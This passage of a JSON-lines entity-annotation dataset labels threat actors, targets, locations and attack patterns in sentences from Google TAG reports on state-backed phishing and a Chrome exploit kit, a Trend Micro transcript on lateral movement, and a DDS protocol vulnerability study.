users.","entities":[{"id":51105,"label":"TIME","start_offset":3,"end_offset":12},{"id":51106,"label":"identity","start_offset":14,"end_offset":17},{"id":51107,"label":"threat-actor","start_offset":29,"end_offset":40},{"id":51108,"label":"SOFTWARE","start_offset":80,"end_offset":88}],"relations":[],"Comments":[]} -{"id":5036,"text":"The targets, primarily located in Lithuania, were sent links to attacker controlled domains from a domain spoofing the Facebook security team.","entities":[{"id":51110,"label":"identity","start_offset":119,"end_offset":141},{"id":51109,"label":"location","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} -{"id":5037,"text":"Recently observed Ghostwriter credential phishing domains and emails: Curious Gorge, a group TAG attributes to China's PLA SSF, has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia.","entities":[{"id":51116,"label":"location","start_offset":232,"end_offset":238},{"id":51117,"label":"location","start_offset":243,"end_offset":255},{"id":51113,"label":"identity","start_offset":93,"end_offset":96},{"id":51115,"label":"location","start_offset":223,"end_offset":230},{"id":51112,"label":"threat-actor","start_offset":70,"end_offset":83},{"id":51111,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":51114,"label":"identity","start_offset":111,"end_offset":126}],"relations":[{"id":1046,"from_id":51112,"to_id":51114,"type":"attributed-to"},{"id":1047,"from_id":51112,"to_id":51115,"type":"targets"},{"id":1048,"from_id":51112,"to_id":51116,"type":"targets"},{"id":1049,"from_id":51112,"to_id":51117,"type":"targets"}],"Comments":[]} -{"id":5038,"text":"In Russia, long running campaigns against multiple government organizations have continued, including the Ministry of Foreign Affairs.","entities":[{"id":51119,"label":"identity","start_offset":106,"end_offset":133},{"id":51118,"label":"location","start_offset":3,"end_offset":9}],"relations":[],"Comments":[]} -{"id":5039,"text":"Over the past week, TAG identified additional compromises impacting multiple Russian defense contractors and manufacturers and a Russian logistics company.","entities":[{"id":51120,"label":"identity","start_offset":20,"end_offset":23},{"id":51122,"label":"identity","start_offset":129,"end_offset":154},{"id":51121,"label":"identity","start_offset":77,"end_offset":122}],"relations":[],"Comments":[]} -{"id":5040,"text":" Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further exploitation.","entities":[{"id":51123,"label":"SOFTWARE","start_offset":67,"end_offset":80}],"relations":[],"Comments":[]} -{"id":5041,"text":"We also send all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity.","entities":[{"id":51125,"label":"SOFTWARE","start_offset":36,"end_offset":45},{"id":51124,"label":"SOFTWARE","start_offset":26,"end_offset":31}],"relations":[],"Comments":[]} -{"id":5042,"text":"We encourage any potential targets to enable Google Account Level Enhanced Safe Browsing and ensure that all devices are updated.","entities":[],"relations":[],"Comments":[]} -{"id":5043,"text":"The team continues to work around the clock, focusing on the safety and security of our users and the platforms that help them access and share important information.","entities":[],"relations":[],"Comments":[]} -{"id":5044,"text":"We’ll continue to take action, identify bad actors and share relevant information with others across industry and governments, with the goal of bringing awareness to these issues, protecting users and preventing future attacks.","entities":[],"relations":[],"Comments":[]} -{"id":5046,"text":"In early March, Google’s Threat Analysis Group (TAG) published an update on the cyber activity it was tracking with regard to the war in Ukraine.","entities":[{"id":51129,"label":"identity","start_offset":16,"end_offset":52},{"id":51130,"label":"location","start_offset":137,"end_offset":144},{"id":51128,"label":"TIME","start_offset":3,"end_offset":14}],"relations":[],"Comments":[]} -{"id":5047,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":51131,"label":"identity","start_offset":23,"end_offset":26},{"id":51132,"label":"attack-pattern","start_offset":106,"end_offset":134}],"relations":[],"Comments":[]} -{"id":5049,"text":"Financially motivated and criminal actors are also using current events as a means for targeting users.","entities":[],"relations":[],"Comments":[]} -{"id":5051,"text":"TAG has also continued to observe multiple ransomware brokers continuing to operate in a business as usual sense.","entities":[{"id":51139,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":5052,"text":"As always, we continue to publish details surrounding the actions we take against coordinated influence operations in our quarterly TAG bulletin.","entities":[{"id":51140,"label":"identity","start_offset":132,"end_offset":135}],"relations":[],"Comments":[]} -{"id":5053,"text":"We promptly identify and remove any such content, but have not observed any significant shifts from the normal levels of activity that occur in the region.","entities":[],"relations":[],"Comments":[]} -{"id":5054,"text":"Here is a deeper look at the campaign activity TAG has observed over the past two weeks: Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.","entities":[{"id":51145,"label":"location","start_offset":220,"end_offset":227},{"id":51148,"label":"location","start_offset":253,"end_offset":261},{"id":51149,"label":"identity","start_offset":179,"end_offset":216},{"id":51141,"label":"identity","start_offset":47,"end_offset":50},{"id":51142,"label":"threat-actor","start_offset":89,"end_offset":102},{"id":51143,"label":"identity","start_offset":112,"end_offset":115},{"id":51144,"label":"identity","start_offset":130,"end_offset":145},{"id":51146,"label":"location","start_offset":229,"end_offset":235},{"id":51147,"label":"location","start_offset":237,"end_offset":247}],"relations":[{"id":1050,"from_id":51142,"to_id":51144,"type":"attributed-to"},{"id":1051,"from_id":51142,"to_id":51149,"type":"targets"},{"id":1052,"from_id":51142,"to_id":51145,"type":"targets"},{"id":1053,"from_id":51142,"to_id":51146,"type":"targets"},{"id":1054,"from_id":51142,"to_id":51147,"type":"targets"},{"id":1055,"from_id":51142,"to_id":51148,"type":"targets"}],"Comments":[]} -{"id":5055,"text":"While this activity largely does not impact Google products, we remain engaged and are providing notifications to victim organizations.","entities":[{"id":51150,"label":"identity","start_offset":44,"end_offset":50}],"relations":[],"Comments":[]} -{"id":5056,"text":"Recently observed IPs used in Curious Gorge campaigns: COLDRIVER, a Russian-based threat actor sometimes referred to as Calisto, has launched credential phishing campaigns, targeting several US based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.","entities":[{"id":51151,"label":"threat-actor","start_offset":30,"end_offset":43},{"id":51152,"label":"threat-actor","start_offset":55,"end_offset":64},{"id":51153,"label":"location","start_offset":68,"end_offset":75},{"id":51154,"label":"threat-actor","start_offset":120,"end_offset":127},{"id":51155,"label":"attack-pattern","start_offset":142,"end_offset":171},{"id":51157,"label":"identity","start_offset":226,"end_offset":255},{"id":51158,"label":"identity","start_offset":263,"end_offset":295},{"id":51156,"label":"identity","start_offset":191,"end_offset":220}],"relations":[{"id":1056,"from_id":51152,"to_id":51153,"type":"located-at"},{"id":1057,"from_id":51154,"to_id":51152,"type":"duplicate-of"},{"id":1058,"from_id":51152,"to_id":51155,"type":"uses"},{"id":1059,"from_id":51152,"to_id":51156,"type":"targets"},{"id":1060,"from_id":51152,"to_id":51157,"type":"targets"},{"id":1061,"from_id":51152,"to_id":51158,"type":"targets"}],"Comments":[]} -{"id":5057,"text":"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence.","entities":[{"id":51162,"label":"identity","start_offset":142,"end_offset":167},{"id":51159,"label":"identity","start_offset":29,"end_offset":32},{"id":51160,"label":"threat-actor","start_offset":46,"end_offset":55},{"id":51161,"label":"identity","start_offset":101,"end_offset":127}],"relations":[{"id":1062,"from_id":51160,"to_id":51161,"type":"targets"},{"id":1063,"from_id":51160,"to_id":51162,"type":"targets"}],"Comments":[]} -{"id":5058,"text":"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.","entities":[{"id":51163,"label":"SOFTWARE","start_offset":46,"end_offset":51}],"relations":[],"Comments":[]} -{"id":5059,"text":"We have not observed any Gmail accounts successfully compromised during these campaigns.","entities":[{"id":51164,"label":"SOFTWARE","start_offset":25,"end_offset":30}],"relations":[],"Comments":[]} -{"id":5060,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.","entities":[{"id":51165,"label":"location","start_offset":72,"end_offset":82},{"id":51166,"label":"campaign","start_offset":145,"end_offset":174},{"id":15621,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":15623,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1064,"from_id":15623,"to_id":51165,"type":"located-at"},{"id":1065,"from_id":15623,"to_id":51166,"type":"uses"}],"Comments":[]} -{"id":5061,"text":"In mid-March, a security researcher released a blog post detailing a 'Browser in the Browser' phishing technique.","entities":[{"id":51167,"label":"TIME","start_offset":3,"end_offset":12}],"relations":[],"Comments":[]} -{"id":5062,"text":"While TAG has previously observed this technique being used by multiple government-backed actors, the media picked up on this blog post, publishing several stories highlighting this phishing capability.","entities":[{"id":51168,"label":"identity","start_offset":6,"end_offset":9}],"relations":[],"Comments":[]} -{"id":5063,"text":"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites.","entities":[{"id":51170,"label":"attack-pattern","start_offset":111,"end_offset":173},{"id":51169,"label":"threat-actor","start_offset":0,"end_offset":11}],"relations":[{"id":1066,"from_id":51169,"to_id":51170,"type":"uses"}],"Comments":[]} -{"id":5064,"text":"The new technique, displayed below, draws a login page that appears to be on the passport.i.ua domain, overtop of the page hosted on the compromised site.","entities":[{"id":51171,"label":"DOMAIN","start_offset":81,"end_offset":94}],"relations":[],"Comments":[]} -{"id":5065,"text":"Once a user provides credentials in the dialog, they are posted to an attacker controlled domain.","entities":[],"relations":[],"Comments":[]} -{"id":5066,"text":"Recently observed Ghostwriter credential phishing domains:","entities":[{"id":51172,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":51173,"label":"attack-pattern","start_offset":30,"end_offset":49}],"relations":[{"id":1067,"from_id":51172,"to_id":51173,"type":"uses"}],"Comments":[]} -{"id":5067,"text":"The team continues to work around the clock, focusing on the safety and security of our users and the platforms that help them access and share important information.","entities":[],"relations":[],"Comments":[]} -{"id":5068,"text":"We’ll continue to take action, identify bad actors and share relevant information with others across industry and governments, with the goal of bringing awareness to these issues, protecting users and preventing future attacks.","entities":[],"relations":[],"Comments":[]} -{"id":5070,"text":"On February 10, Threat Analysis Group discovered two distinct North Korean government-backed attacker groups exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609.","entities":[{"id":51176,"label":"TIME","start_offset":3,"end_offset":14},{"id":51177,"label":"identity","start_offset":16,"end_offset":37},{"id":51178,"label":"threat-actor","start_offset":62,"end_offset":108},{"id":51179,"label":"vulnerability","start_offset":122,"end_offset":157},{"id":51180,"label":"vulnerability","start_offset":169,"end_offset":182},{"id":51181,"label":"SOFTWARE","start_offset":161,"end_offset":167}],"relations":[{"id":1068,"from_id":51179,"to_id":51180,"type":"duplicate-of"},{"id":1069,"from_id":51181,"to_id":51180,"type":"has"},{"id":1070,"from_id":51178,"to_id":51180,"type":"exploits"}],"Comments":[]} -{"id":5071,"text":"These groups' activity has been publicly tracked as Operation Dream Job and Operation AppleJeus.","entities":[{"id":51183,"label":"campaign","start_offset":76,"end_offset":95},{"id":51182,"label":"campaign","start_offset":52,"end_offset":71}],"relations":[],"Comments":[]} -{"id":5073,"text":"However, other organizations and countries may have been targeted.","entities":[],"relations":[],"Comments":[]} -{"id":5074,"text":"One of the campaigns has direct infrastructure overlap with a campaign targeting security researchers which we reported on last year.","entities":[],"relations":[],"Comments":[]} -{"id":5075,"text":"The exploit was patched on February 14, 2022.","entities":[{"id":51185,"label":"TIME","start_offset":27,"end_offset":44}],"relations":[],"Comments":[]} -{"id":5076,"text":"The earliest evidence we have of this exploit kit being actively deployed is January 4, 2022.","entities":[{"id":51186,"label":"TIME","start_offset":77,"end_offset":92}],"relations":[],"Comments":[]} -{"id":5077,"text":"We suspect that these groups work for the same entity with a shared supply chain, hence the use of the same exploit kit, but each operate with a different mission set and deploy different techniques.","entities":[],"relations":[],"Comments":[]} -{"id":5078,"text":"It is possible that other North Korean government-backed attackers have access to the same exploit kit.","entities":[{"id":51187,"label":"threat-actor","start_offset":26,"end_offset":66}],"relations":[],"Comments":[]} -{"id":5079,"text":"In this blog, we will walk through the observed tactics, techniques and procedures, share relevant IOCs and analyze the exploit kit used by the attackers.","entities":[],"relations":[],"Comments":[]} -{"id":5080,"text":"In line with our current disclosure policy, we are providing these details 30 days after the patch release.","entities":[],"relations":[],"Comments":[]} -{"id":5081,"text":"The campaign, consistent with Operation Dream Job, targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors.","entities":[{"id":51188,"label":"campaign","start_offset":30,"end_offset":49}],"relations":[],"Comments":[]} -{"id":5082,"text":"The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities.","entities":[{"id":51189,"label":"identity","start_offset":64,"end_offset":70},{"id":51191,"label":"identity","start_offset":83,"end_offset":89},{"id":51190,"label":"identity","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} -{"id":5083,"text":"The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.","entities":[{"id":51193,"label":"identity","start_offset":84,"end_offset":96},{"id":51192,"label":"identity","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} -{"id":5084,"text":"Victims who clicked on the links would be served a hidden iframe that would trigger the exploit kit.","entities":[],"relations":[],"Comments":[]} -{"id":5085,"text":"Attacker-Owned Fake Job Domains: Exploitation URLs:","entities":[],"relations":[],"Comments":[]} -{"id":5086,"text":"Another North Korean group, whose activity has been publicly tracked as Operation AppleJeus, targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit.","entities":[{"id":51194,"label":"location","start_offset":8,"end_offset":20},{"id":51195,"label":"campaign","start_offset":72,"end_offset":91}],"relations":[],"Comments":[]} -{"id":5087,"text":"This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors.","entities":[],"relations":[],"Comments":[]} -{"id":5088,"text":"In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.","entities":[],"relations":[],"Comments":[]} -{"id":5089,"text":"Attacker-Owned Websites: Compromised Websites (Feb 7 - Feb 9): Exploitation URLs:","entities":[],"relations":[],"Comments":[]} -{"id":5090,"text":"The attackers made use of an exploit kit that contained multiple stages and components in order to exploit targeted users.","entities":[],"relations":[],"Comments":[]} -{"id":5091,"text":"The attackers placed links to the exploit kit within hidden iframes, which they embedded on both websites they owned as well as some websites they compromised.","entities":[],"relations":[],"Comments":[]} -{"id":5092,"text":"The kit initially serves some heavily obfuscated javascript used to fingerprint the target system.","entities":[],"relations":[],"Comments":[]} -{"id":5093,"text":"This script collected all available client information such as the user-agent, resolution, etc. and then sent it back to the exploitation server.","entities":[],"relations":[],"Comments":[]} -{"id":5094,"text":"If a set of unknown requirements were met, the client would be served a Chrome RCE exploit and some additional javascript.","entities":[{"id":51196,"label":"SOFTWARE","start_offset":72,"end_offset":78},{"id":51197,"label":"attack-pattern","start_offset":79,"end_offset":82}],"relations":[],"Comments":[]} -{"id":5095,"text":"If the RCE was successful, the javascript would request the next stage referenced within the script as “SBX”, a common acronym for Sandbox Escape.","entities":[{"id":51198,"label":"attack-pattern","start_offset":7,"end_offset":10},{"id":51199,"label":"attack-pattern","start_offset":131,"end_offset":145}],"relations":[],"Comments":[]} -{"id":5096,"text":"We unfortunately were unable to recover any of the stages that followed the initial RCE.","entities":[{"id":51200,"label":"attack-pattern","start_offset":84,"end_offset":87}],"relations":[],"Comments":[]} -{"id":5097,"text":"Careful to protect their exploits, the attackers deployed multiple safeguards to make it difficult for security teams to recover any of the stages.","entities":[],"relations":[],"Comments":[]} -{"id":5098,"text":"These safeguards included: Although we recovered a Chrome RCE, we also found evidence where the attackers specifically checked for visitors using Safari on MacOS or Firefox (on any OS), and directed them to specific links on known exploitation servers.","entities":[{"id":51202,"label":"attack-pattern","start_offset":58,"end_offset":61},{"id":51201,"label":"SOFTWARE","start_offset":51,"end_offset":57},{"id":51203,"label":"SOFTWARE","start_offset":146,"end_offset":152},{"id":51204,"label":"SOFTWARE","start_offset":156,"end_offset":161},{"id":51205,"label":"SOFTWARE","start_offset":165,"end_offset":172}],"relations":[],"Comments":[]} -{"id":5099,"text":"We did not recover any responses from those URLs.","entities":[],"relations":[],"Comments":[]} -{"id":5100,"text":"Example Exploit Kit:","entities":[],"relations":[],"Comments":[]} -{"id":5101,"text":"The attackers made multiple attempts to use the exploit days after the vulnerability was patched on February 14, which stresses the importance of applying security updates as they become available.","entities":[{"id":51206,"label":"TIME","start_offset":100,"end_offset":111}],"relations":[],"Comments":[]} -{"id":5102,"text":"As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.","entities":[],"relations":[],"Comments":[]} -{"id":5103,"text":"Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further exploitation.","entities":[],"relations":[],"Comments":[]} -{"id":5104,"text":"We also sent all targeted Gmail and Workspace users government-backed attacker alerts notifying them of the activity.","entities":[{"id":51207,"label":"SOFTWARE","start_offset":26,"end_offset":45}],"relations":[],"Comments":[]} -{"id":5105,"text":"We encourage any potential targets to enable Enhanced Safe Browsing for Chrome and ensure that all devices are updated.","entities":[],"relations":[],"Comments":[]} -{"id":5106,"text":"TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted or suffered from these activities.","entities":[{"id":51208,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":5107,"text":"We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across industry.","entities":[],"relations":[],"Comments":[]} -{"id":5108,"text":"&nbsp; [Lightly edited transcript of the video above] Hi there, Mark Nunnikhoven from Trend Micro Research, I want to talk to you about the concept of lateral movement.","entities":[{"id":51211,"label":"attack-pattern","start_offset":155,"end_offset":171},{"id":51209,"label":"identity","start_offset":68,"end_offset":84},{"id":51210,"label":"identity","start_offset":90,"end_offset":110}],"relations":[{"id":1071,"from_id":51209,"to_id":51210,"type":"related-to"}],"Comments":[]} -{"id":5109,"text":"And the reason why I want to tackle this today is because I've had some conversations in the last few days that have really kind of hit that idea bulb that people don't truly understand how cybercriminals get away with their crimes in the organization.","entities":[],"relations":[],"Comments":[]} -{"id":5110,"text":"Specifically how they launch their attacks","entities":[],"relations":[],"Comments":[]} -{"id":5111,"text":"Now don't get me wrong, this isn't to blame on defenders.","entities":[],"relations":[],"Comments":[]} -{"id":5112,"text":"This isn't to blame of the general public.","entities":[],"relations":[],"Comments":[]} -{"id":5113,"text":"I'm going to go with Hollywood's to blame a little bit here, because we're watching movies in Hollywood inevitably…you know the hackers in their dark hat and with no lighting, underground, Lord knows where they find these places to hack from and they are attacking directly through.","entities":[],"relations":[],"Comments":[]} -{"id":5114,"text":"You see a bunch of text go across the screen and they penetrate through the first firewall, through the second firewall in into the data.","entities":[],"relations":[],"Comments":[]} -{"id":5115,"text":"That's not how it works at all.","entities":[],"relations":[],"Comments":[]} -{"id":5116,"text":"That's ridiculous.","entities":[],"relations":[],"Comments":[]} -{"id":5117,"text":"It's absurd.","entities":[],"relations":[],"Comments":[]} -{"id":5118,"text":"[00:59] It makes for interesting cinema, just like the red code\/green code in CSI Cyber, but it's not a reflection of reality and that's a real challenge.","entities":[],"relations":[],"Comments":[]} -{"id":5119,"text":"Because a lot of people don't have the experience of working with cybersecurity, working in cybersecurity, so their only perception is what they see either through media—you know TV, movies, books—or if they happen to run into somebody at in the industry.","entities":[],"relations":[],"Comments":[]} -{"id":5120,"text":"So there is an overwhelming amount of sort of information or misinformation.","entities":[],"relations":[],"Comments":[]} -{"id":5121,"text":"Not even misinformation, just storytelling that tries to make it far more dramatic than it is.","entities":[],"relations":[],"Comments":[]} -{"id":5122,"text":"The reality is that cybercriminals are out for profit.","entities":[],"relations":[],"Comments":[]} -{"id":5123,"text":"We know this time and time again—yes a bunch of nation-state stuff does happen but the vast majority of you are unaffected by it same with there's a massive amount of script-kiddie just sort of scanning random people with random tools that are just seeing what they can get away with that and if you have solid, automated defenses that doesn't really impact you.","entities":[],"relations":[],"Comments":[]} -{"id":5124,"text":"What does impact you is the vast majority of organized cybercriminals who are out to make a profit.","entities":[],"relations":[],"Comments":[]} -{"id":5125,"text":"Trend Micro had a great series and continues to have a great series on the Underground, the Digital Underground that shows just how deep these profit motivations go.","entities":[{"id":51212,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":5126,"text":"This is very much a dark industry.","entities":[],"relations":[],"Comments":[]} -{"id":5127,"text":"And with that in mind we come back to the concept of lateral movement.","entities":[{"id":51213,"label":"attack-pattern","start_offset":53,"end_offset":69}],"relations":[],"Comments":[]} -{"id":5128,"text":"[02:22] If an attacker breaches into your systems, whether they come in like a fourth of all attacks do via email whether they come in directly through a server compromise, which is about half of all breaches according to the Verizon data breach investigation report or one of the other methods that is commonly used…then they start to move around within your network.","entities":[],"relations":[],"Comments":[]} -{"id":5129,"text":"That's lateral movement.","entities":[{"id":51214,"label":"attack-pattern","start_offset":7,"end_offset":23}],"relations":[],"Comments":[]} -{"id":5130,"text":"We talk about north\/south traffic with the network, which is basically inside the network to outside of the network, so out to the the internet and back.","entities":[],"relations":[],"Comments":[]} -{"id":5131,"text":"East\/west is within the network itself.","entities":[],"relations":[],"Comments":[]} -{"id":5132,"text":"Most defenses, traditional defenses worry about that north\/south traffic.","entities":[],"relations":[],"Comments":[]} -{"id":5133,"text":"Not enough worry about the east\/west and it's breaking down finally.","entities":[],"relations":[],"Comments":[]} -{"id":5134,"text":"We are getting rid of this hard perimeter.","entities":[],"relations":[],"Comments":[]} -{"id":5135,"text":"\"It's mine, I defend everything inside\" …and realizing that this is actually how cybercriminals work.","entities":[],"relations":[],"Comments":[]} -{"id":5136,"text":"Once they're inside they move around.","entities":[],"relations":[],"Comments":[]} -{"id":5137,"text":"So we need to defend in-depth and have really great monitoring and protection tools within our networks because of this challenge of lateral movement.","entities":[],"relations":[],"Comments":[]} -{"id":5138,"text":"[03:23] Let me give you a little easier to digest analogy.","entities":[],"relations":[],"Comments":[]} -{"id":5139,"text":"Most of us in a home have a grocery list and maybe once a week—maybe twice–we head to the grocery store and we try to get everything we want off the list and then we come back.","entities":[],"relations":[],"Comments":[]} -{"id":5140,"text":"That just makes sense.","entities":[],"relations":[],"Comments":[]} -{"id":5141,"text":"That's how we do it.","entities":[],"relations":[],"Comments":[]} -{"id":5142,"text":"Right?","entities":[],"relations":[],"Comments":[]} -{"id":5143,"text":"You would never think of going, \"Okay.","entities":[],"relations":[],"Comments":[]} -{"id":5144,"text":"Number one of the list is ketchup.","entities":[],"relations":[],"Comments":[]} -{"id":5145,"text":"I'm going to drive to the store to get ketchup.","entities":[],"relations":[],"Comments":[]} -{"id":5146,"text":"I'm going to buy it and I'm going to come back home.","entities":[],"relations":[],"Comments":[]} -{"id":5147,"text":"I'm going to look at item number two.","entities":[],"relations":[],"Comments":[]} -{"id":5148,"text":"I need a loaf of bread.","entities":[],"relations":[],"Comments":[]} -{"id":5149,"text":"I'm going to drive back to the store.","entities":[],"relations":[],"Comments":[]} -{"id":5150,"text":"I'm going to buy a loaf of bread and I'm going to come back and we can go to item 3, and I'm going to go and I'm going to come back.","entities":[],"relations":[],"Comments":[]} -{"id":5151,"text":"I'm going to...\"","entities":[],"relations":[],"Comments":[]} -{"id":5152,"text":"That's just ridiculous, right?","entities":[],"relations":[],"Comments":[]} -{"id":5153,"text":"That's absolutely absurd and cybercrimals agree.","entities":[],"relations":[],"Comments":[]} -{"id":5154,"text":"Once they've driven to the store.","entities":[],"relations":[],"Comments":[]} -{"id":5155,"text":"They're going to buy everything that they need and everything that they see as an opportunity, right?","entities":[],"relations":[],"Comments":[]} -{"id":5156,"text":"They are really susceptible to those end caps and impulse buys... and then they're going to leave.","entities":[],"relations":[],"Comments":[]} -{"id":5157,"text":"This is how they attack our organizations.","entities":[],"relations":[],"Comments":[]} -{"id":5158,"text":"We know that, because of the average time to detect a breach is around 197 days right now and that stat has fluctuated maybe plus or minus 15 days for the last decade.","entities":[],"relations":[],"Comments":[]} -{"id":5159,"text":"We also know that it takes almost three…it takes two and a half to three months actually contain a breach once you discover it and the reason for all of this is lateral movement.","entities":[],"relations":[],"Comments":[]} -{"id":5160,"text":"Once you're in as a cybercriminal, once you've made headway, once you gained a beachhead or a foothold within that network you're going to do everything you can to expand it because it's going to make you the most amount of money.","entities":[],"relations":[],"Comments":[]} -{"id":5161,"text":"[04:55] What do you think?","entities":[],"relations":[],"Comments":[]} -{"id":5162,"text":"Let us know in the comments below, hit us up on social @TrendMicro or you can reach me directly @marknca.","entities":[{"id":51216,"label":"identity","start_offset":96,"end_offset":104},{"id":51215,"label":"identity","start_offset":55,"end_offset":66}],"relations":[],"Comments":[]} -{"id":5163,"text":"How are you handling lateral movement?","entities":[{"id":51217,"label":"attack-pattern","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} -{"id":5164,"text":"How are you trying to reduce it?","entities":[],"relations":[],"Comments":[]} -{"id":5165,"text":"How are you looking for visibility across all of your systems?","entities":[],"relations":[],"Comments":[]} -{"id":5166,"text":"Let's continue this conversation because when we talk we all get better and more secure online.","entities":[],"relations":[],"Comments":[]} -{"id":5167,"text":" Tags Cloud | APT & Targeted Attacks | Cyber Crime | Expert Perspective | Network | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} -{"id":5168,"text":"By Federico Maggi, Rainer Vosseler (Trend Micro Research), Mars Cheng, Patrick Kuo, Chizuru Toyama, Ta-Lun Yen (TXOne Networks), Erik Boasson (ADLINK), and Victor Mayoral Vilches (Alias Robotics)","entities":[{"id":51226,"label":"identity","start_offset":129,"end_offset":141},{"id":51222,"label":"identity","start_offset":71,"end_offset":82},{"id":51224,"label":"identity","start_offset":100,"end_offset":110},{"id":51218,"label":"identity","start_offset":3,"end_offset":17},{"id":51220,"label":"identity","start_offset":36,"end_offset":56},{"id":51221,"label":"identity","start_offset":59,"end_offset":69},{"id":51223,"label":"identity","start_offset":84,"end_offset":98},{"id":51225,"label":"identity","start_offset":112,"end_offset":126},{"id":51227,"label":"identity","start_offset":143,"end_offset":149},{"id":51219,"label":"identity","start_offset":19,"end_offset":34},{"id":51228,"label":"identity","start_offset":156,"end_offset":178},{"id":51229,"label":"identity","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} -{"id":5169,"text":"Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade.","entities":[],"relations":[],"Comments":[]} -{"id":5170,"text":"This middleware software technology is responsible for running billions of public and private devices and mechanisms currently in use.","entities":[],"relations":[],"Comments":[]} -{"id":5171,"text":" DDS is integral in embedded systems that require real-time machine-to-machine communication, facilitating a reliable communication layer between sensors, controllers, and actuators.","entities":[],"relations":[],"Comments":[]} -{"id":5172,"text":"This technology is situated at the beginning of the supply chain as a layer that connects, controls, and monitors applications, sensors, and actuators, aimed at maintaining interoperability and fault tolerance.","entities":[],"relations":[],"Comments":[]} -{"id":5173,"text":"It is used in various critical sectors such as healthcare, transportation, industrial internet of things (IIoT), robotics, aeronautics, and the military, among others.","entities":[],"relations":[],"Comments":[]} -{"id":5174,"text":"Given these factors, this makes the middleware technology an attractive target for attackers.","entities":[],"relations":[],"Comments":[]} -{"id":5175,"text":"We analyzed this software and found multiple security vulnerabilities.","entities":[],"relations":[],"Comments":[]} -{"id":5176,"text":"This blog lists 13 identified security gaps that were assigned new CVE IDs found in the six most common DDS implementations, mostly concerning deployment.","entities":[],"relations":[],"Comments":[]} -{"id":5177,"text":"We also show a preview of the security gaps we found in the standard’s specification and a summary of our testing procedure.","entities":[],"relations":[],"Comments":[]} -{"id":5178,"text":"For details on the known vulnerabilities, attack scenarios, and research methodology, read our full paper “A Security Analysis of the Data Distribution Service (DDS) Protocol.”","entities":[],"relations":[],"Comments":[]} -{"id":5179,"text":"All the vulnerabilities found have been disclosed and patched or mitigated by their respective vendors.","entities":[],"relations":[],"Comments":[]} -{"id":5180,"text":"New vulnerabilities","entities":[],"relations":[],"Comments":[]} -{"id":5181,"text":"We studied six widely used DDS implementations, chosen based on executions’ number of users and customers in the critical sectors globally.","entities":[],"relations":[],"Comments":[]} -{"id":5182,"text":" We also looked at each implementation’s real-time publish-subscribe (RTPS) packet, as DDS is dependent on its own lower layer standard protocol.","entities":[],"relations":[],"Comments":[]} -{"id":5183,"text":"Notably, we also studied the Robot Operating System 2 (ROS 2) because it uses DDS as its default standard operating system (OS) middleware for all robotics and automation use cases.","entities":[{"id":51230,"label":"SOFTWARE","start_offset":29,"end_offset":61}],"relations":[],"Comments":[]} -{"id":5184,"text":"Given the service’s position as a security and operations building block, all vulnerabilities that affect DDS also affect the rest of the software stack, such as RTPS and all ROS 2 instances.","entities":[{"id":51231,"label":"SOFTWARE","start_offset":175,"end_offset":180},{"id":51232,"label":"SOFTWARE","start_offset":162,"end_offset":166}],"relations":[],"Comments":[]} -{"id":5185,"text":" Product Name","entities":[],"relations":[],"Comments":[]} -{"id":5186,"text":"Developer HQ Region Open Source","entities":[],"relations":[],"Comments":[]} -{"id":5187,"text":"Core Language Year Developed Fast-DDS eProsima EMEA Apache License 2.0 C++ 2014 Cyclone DDS Eclipse Foundation project, driven by ADLINK EMEA Eclipse Public License 2.0 and Eclipse Development License 1.0 C 2011 OpenDDS OCI NABU Custom C++ 2005 Connext DDS RTI NABU Extensions are open source C++ 2005 (NDDS – 1995) CoreDX DDS TwinOaks NABU Not open source C 2009 Gurum DDS GurumNetworks APAC Not open source C Table 1.","entities":[],"relations":[],"Comments":[]} -{"id":5188,"text":"A list of all DDS implementations analyzed for this research.","entities":[],"relations":[],"Comments":[]} -{"id":5189,"text":"MITRE ATT&CK ICS Attack Surface Vector CVE Scope CVSS Weaknesses (CWE) T0804:","entities":[{"id":51233,"label":"identity","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} -{"id":5190,"text":"Brute Force I\/O T0814: DoS T0827: Loss of Control T0880: Loss of Safety T0802: Automated Collection T0846: Remote System 